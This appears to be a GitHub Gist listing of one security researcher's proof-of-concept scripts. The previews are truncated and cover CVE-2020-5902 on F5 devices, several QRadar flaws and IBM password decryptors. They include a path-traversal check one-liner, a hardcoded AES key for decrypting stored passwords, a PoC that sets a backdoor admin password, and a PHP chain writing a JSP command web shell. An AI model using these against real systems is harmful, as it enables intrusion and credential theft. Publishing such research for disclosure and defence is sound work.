Skip to content

Instantly share code, notes, and snippets.

@ykoster
ykoster / cicdecrypt.py
Created Dec 24, 2020
IBM Installation Manager imcl / imutilsc encryptString command decrypt script
View cicdecrypt.py
#!/usr/bin/env python3
import re
import sys
import base64
from Crypto.Cipher import AES
val = '^(?:[A-Z0-9+/]{4})*(?:[A-Z0-9+/]{2}==|[A-Z0-9+/]{3}=)?$'
key = base64.b64decode(b'BTQOll+YFPIcsB+vMfXNTg==')
def decrypt(e):
@ykoster
ykoster / ghcdecrypt.py
Created Dec 23, 2020
IBM Green Hat / Rational Integration Tester password decryptor
View ghcdecrypt.py
#!/usr/bin/env python3
import re
import sys
import array
val = '^#com.ghc.1![0-9A-F]+$'
key = array.array('H', [0x12FD, 0x4AAD, 0x4405, 0xE327, 0xA28A, 0x7211, 0x1111, 0x5543, 0x0CDD, 0x6A31, 0x4080, 0x217E, 0x7E73])
def decrypt(e):
p = re.compile(val, re.IGNORECASE)
@ykoster
ykoster / cve-2020-5902-tmsh.py
Created Jul 5, 2020
Proof of concept for CVE-2020-5902 - WARNING this PoC changes the password and shell of the admin user
View cve-2020-5902-tmsh.py
#!/usr/bin/env python3
import os
import requests
import urllib.parse
target='<ip of target>'
base_url=f'https://{target}/'
password='B@ckd00r!'
def check(base_url):
@ykoster
ykoster / cve-2020-5902-check.sh
Last active Jul 8, 2020
Bash one-liner to check if a device is vulnerable for CVE-2020-5902
View cve-2020-5902-check.sh
curl --silent --insecure 'https://[ip]/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=Vulnerable' | \
grep -q Vulnerable && \
printf '\033[0;31mVulnerable\n' || \
printf '\033[0;32mNot Vulnerable\n'
@ykoster
ykoster / qradar_deserialize.py
Created Apr 16, 2020
Proof of concept for Java deserialization vulnerability in QRadar RemoteJavaScript Servlet
View qradar_deserialize.py
#!/usr/bin/env python3
import json
import random
import urllib3
import requests
import urllib.parse
base_url='https://127.0.0.1/'
username='admin'
password='initial'
@ykoster
ykoster / qradar_session_deserialize.py
Created Apr 16, 2020
Proof of concept for QRadar session manager path traversal vulnerability
View qradar_session_deserialize.py
#!/usr/bin/env python3
import json
import base64
import random
import urllib3
import requests
import urllib.parse
base_url=f'https://127.0.0.1/'
username='admin'
@ykoster
ykoster / qradar_php_lfi.py
Created Apr 16, 2020
Arbitrary class instantiation & local file inclusion vulnerability in QRadar Forensics web application (CVE-2020-4272) proof of concept
View qradar_php_lfi.py
#!/usr/bin/env python3
import json
import urllib3
import requests
import urllib.parse
from requests.cookies import cookiejar_from_dict
base_url=f'https://127.0.0.1/'
username='admin'
password='initial'
@ykoster
ykoster / pop_chain.php
Created Apr 16, 2020
PHP object injection vulnerability in QRadar Forensics web application (CVE-2020-4271) proof of concept
View pop_chain.php
<?php
include("/opt/ibm/forensics/html/includes/license.inc.php");
include("/opt/ibm/forensics/html/includes/simple_html_dom.php");
$jsp = <<<__EOF
<!DOCTYPE html>
<html>
<pre>
<%@page import="java.util.*,java.io.*"%>
<% if (request.getParameter("c") != null) {
@ykoster
ykoster / qradar_rss_ssrf.py
Created Apr 16, 2020
QRadar RssFeedItem Server-Side Request Forgery vulnerability (CVE-2020-4294) proof of concept
View qradar_rss_ssrf.py
#!/usr/bin/env python3
import json
import random
import urllib3
import requests
import urllib.parse
base_url='https://127.0.0.1/'
username='admin'
password='initial'
@ykoster
ykoster / qradar_run-result-reader_lpe.sh
Created Apr 16, 2020
Local privilege escalation in QRadar due to run-result-reader.sh insecure file permissions (CVE-2020-4270) proof of concept
View qradar_run-result-reader_lpe.sh
#!/bin/bash
trap cleanup INT
function cleanup()
{
if [ -f /tmp/run-result-reader.sh ]
then
/usr/bin/cat /tmp/run-result-reader.sh > /opt/qvm/iem/bin/run-result-reader.sh
/usr/bin/rm -f /tmp/run-result-reader.sh
fi